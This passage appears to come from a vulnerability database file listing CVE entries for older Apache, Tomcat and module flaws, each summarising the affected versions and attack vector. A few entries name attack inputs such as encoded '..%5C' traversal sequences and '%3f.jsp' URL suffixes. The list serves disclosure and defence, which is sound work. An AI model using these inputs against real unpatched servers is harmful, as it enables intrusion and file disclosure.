13540| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13541| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
13542| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
13543| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
13544| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
13545| [CVE-2005-0108] Apache mod_auth_radius 1.5.4 and libpam-radius-auth allow remote malicious RADIUS servers to cause a denial of service (crash) via a RADIUS_REPLY_MESSAGE with a RADIUS attribute length of 1, which leads to a memcpy operation with a -1 length argument.
13546| [CVE-2004-2734] webadmin-apache.conf in Novell Web Manager of Novell NetWare 6.5 uses an uppercase Alias tag with an inconsistent lowercase directory tag for a volume, which allows remote attackers to bypass access control to the WEB-INF folder.
13547| [CVE-2004-2680] mod_python (libapache2-mod-python) 3.1.4 and earlier does not properly handle when output filters process more than 16384 bytes, which can cause filter.read to return portions of previously freed memory.
13548| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
13549| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
13550| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
13551| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
13552| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
13553| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
13554| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
13555| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
13556| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13557| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
13558| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
13559| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
13560| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
13561| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
13562| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
13563| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
13564| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
13565| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
13566| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
13567| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
13568| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
13569| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
13570| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
13571| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
13572| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
13573| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
13574| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
13575| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
13576| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
13577| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
13578| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
13579| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
13580| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
13581| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
13582| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
13583| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13584| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13585| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
13586| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
13587| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
13588| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
13589| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
13590| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
13591| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
13592| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
13593| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
13594| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
13595| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
13596| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
13597| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
13598| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
13599| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
13600| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
13601| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
13602| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
13603| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
13604| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
13605| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
13606| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
13607| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
13608| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
13609| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
13610| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
13611| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
13612| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
13613| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
13614| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
13615| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
13616| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
13617| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
13618| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
13619| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
13620| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
13621| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
13622| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
13623| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
13624| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
13625| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
13626| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
13627| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
13628| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
13629| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
13630| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13631| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
13632| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
13633| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
13634| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
13635| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
13636| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
13637| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
13638| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
13639| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
13640| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
13641| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
13642| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
13643| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
13644| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
13645| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
13646| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
13647| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
13648| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
13649| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
13650| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
13651| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
13652| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
13653| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
13654| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
13655| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
13656| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
13657| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
13658| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
13659| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
13660| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
13661| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
13662| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
13663| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
13664| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
13665| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
13666| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
13667| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
13668| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
13669| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
13670| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
13671| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
13672| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
13673| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
13674| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
13675| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
13676| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
13677| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
13678| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
13679| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
13680| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
13681| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
13682| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
